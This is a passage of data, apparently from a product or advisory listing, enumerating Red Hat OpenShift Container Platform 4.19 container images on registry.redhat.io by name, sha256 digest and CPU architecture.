"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
